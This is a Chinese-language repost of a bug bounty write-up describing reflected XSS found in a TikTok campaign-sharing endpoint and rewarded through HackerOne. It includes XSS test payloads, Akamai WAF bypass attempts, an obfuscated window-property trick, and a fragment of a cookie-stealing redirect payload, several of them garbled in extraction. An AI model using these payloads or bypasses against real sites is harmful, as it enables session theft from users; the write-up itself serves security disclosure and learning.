我如何在 TikTok 漏洞赏金计划中赚到 3000 美元
原文链接: https://mp.weixin.qq.com/s?__biz=MzkwOTE5MDY5NA==&mid=2247506998&idx=1&sn=52801a9414af3059d542caf9da05aa53
我如何在 TikTok 漏洞赏金计划中赚到 3000 美元
haidragon 安全狗的自我修养 2025-07-17 04:10
Hackerone.com 上的 TikTok 漏洞赏金计划
那只是一个普通的夜晚。一个朋友邀请我去玩《Valorant》(游戏)——典型的夜间例行活动。但不知何故,我拒绝了。我打开了我的 Burpsuite,开始四处寻找赏金任务。这真是我做过的最棒的决定。
因为那天晚上,我在 TikTok 上发现了三个漏洞,最终让我总共赚了3000 美元。
侦察游戏
我的旅程始于简单的侦察。我曾经
urlscan.io
扫描过所有与TikTok域名相关的端点。经过一番挖掘,我最终得到了一个庞大的列表——大约有10,000个URL。
手动滚动浏览(没错,就是手动),我发现一个端点位于一个看起来像是活动共享功能的路径下。该 URL 附带了几个参数——这立刻激起了我的好奇心。(无法分享完整的端点)
我开始尝试这个
region
参数。为了测试反射,我添加了这个无害的payload:
?region=id'”>
<
u
testest
</
u
你猜怎么着?
它反映得很干净。没有经过任何清理。没有经过任何编码。
进入 WAF — Akamai
我心想:“好吧……这可能很有趣。” 所以我用一个经典的有效载荷进行了测试:
“>
<
img
src
=
x
onerror
=
alert(document.domain)
被Akamai屏蔽——TikTok 的 WAF。而且不是普通的 WAF……难度很高。
游戏开始。
绕过尝试
我开始深入研究Akamai WAF 绕过技术。我发现了一些关于字符串混淆、大小写敏感和标签规避的精彩文章。
一些常见的尝试包括:
</
ScRiPt
→ blocked
</
SCRIPT→ blocked
</
ScRpt→ not blocked, but also invalid
→ bypassed briefly, but eventually got filtered again
我知道我需要一些更有创意的东西。
有效载荷的演变
经过多次失败的尝试,我想到了这个看起来很奇怪但有效的绕过字符串:
}
这样就绕过了过滤——但是 alert()、confirm() 和 prompt()在运行时都被阻止了。因此,我选择谨慎行事,先报告了该漏洞,并使用了开放的重定向有效载荷,以避免潜在的重复提交。
完整的有效载荷有点疯狂,看起来像这样:
}
两天后,我收到了 HackerOne Triage 的回复:
构造一个真正的XSS
我又回到了绘图板上。由于直接访问
alert()
被屏蔽了,我尝试使用混淆访问来破解它:
window
/xxx/
;
全部有效载荷:
成功了。我更新了 PoC 并再次发送了它。
内部分类小组回复:
已接受的挑战。
我继续使用这个最终的有效载荷来窃取cookie:
window/xxx/[‘loca’+’tion’] =’http://
轰!确认有效XSS攻击。同一天,1000美元的悬赏金落入。
额外奖励:另外两个 Bug
这次胜利之后,我继续深入研究同一路径家族中的更多端点。最终,我又发现了两个具有相同漏洞的端点。
同样的技术。同样的XSS。同样的悬赏:每人1000美元。
💸 最终结果
- 第一个漏洞:1000美元
- 第二个漏洞:1000 美元
- 第三个漏洞:1000美元
总计:3,000 美元
那天晚上我甚至不需要玩 Valorant。
对黑客同仁的最后思考
漏洞赏金不仅仅关乎技巧——它关乎耐心、侦察、创造力和时机。有时候,拒绝游戏邀请就能让你多赚几千美元😂
致所有漏洞猎人:永远不要低估反射参数。最简单的漏洞也能带来意想不到的回报——前提是,你知道如何正确构建你的payload。
继续学习,注意安全。
-
公众号:安全狗的自我修养
-
vx:2207344074
-
http://
gitee.com/haidragon -
http://
github.com/haidragon -
bilibili:haidragonx
-